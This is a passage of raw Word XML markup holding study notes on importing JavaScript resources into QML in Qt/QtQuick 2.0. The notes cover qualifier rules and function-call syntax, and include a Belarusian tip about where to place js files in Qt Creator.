          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C49D7" w:rsidRPr="00D815C8" w:rsidRDefault="004C49D7" w:rsidP="004C49D7">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"ResourceURL"</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as</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Qualifier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE54A7" w:rsidRPr="00D815C8" w:rsidRDefault="004C49D7" w:rsidP="00DE54A7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Imported JavaScript resources are always qualified using the "as" keyword. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qualifier</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for JavaScript resources must be unique, so there is always a one-to-one mapping between qualifiers and JavaScript files. (This also means qualifiers cannot be named the same as built-in JavaScript objects such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Math</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>).</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highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rules for qualifier</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C49D7" w:rsidRPr="00D815C8" w:rsidRDefault="004C49D7" w:rsidP="00DE54A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The functions defined in an imported JavaScript file are available to objects defined in the importing QML document, via the</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w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qualifier.functionName(params)"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Functions in JavaScript resources may take parameters whose type can be any of the supported QML basic types or object types, as well as normal JavaScript types. The normal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>data type conversion rules</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will apply to parameters and return values when calling such functions from QML.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D1930" w:rsidRPr="00D815C8" w:rsidRDefault="003D1930" w:rsidP="00DE54A7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Заўвага!!!</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> У крыатары трэба змяшчаць </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> файлы пад тым жа слэшам, што і кмл файлы. Тады ўсё запрацуе. Інакш </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> файлы змяшчаюцца ў папку </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>other</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>files</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> і адтуль іх не бачна.</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>://</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stackoverflow</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>questions</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>/36754394/</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qt</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creator</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>found</w:t>
      </w:r>
      <w:r w:rsidR="00FB7508" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D1930" w:rsidRPr="00D815C8" w:rsidRDefault="003D1930" w:rsidP="008F15ED">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc483000538"/>
      <w:bookmarkStart w:id="87" w:name="_Toc483603898"/>
      <w:bookmarkStart w:id="88" w:name="_Toc483605118"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Imports Within JavaScript Resources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
      <w:bookmarkEnd w:id="87"/>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w:rsidR="004C49D7" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00DE54A7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick 2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, support has been added </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to allow JavaScript resources to import other JavaScript resources and also QML type namespaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a variation of the standard QML import syntax (where all of the previously described rules and qualifications apply).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00487A25">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Due to the ability of a JavaScript resource to import another script or QML module in this fashion in </w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>QtQuick 2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, some extra </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>semantics are defined</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00487A25" w:rsidRPr="00D815C8" w:rsidRDefault="00487A25" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
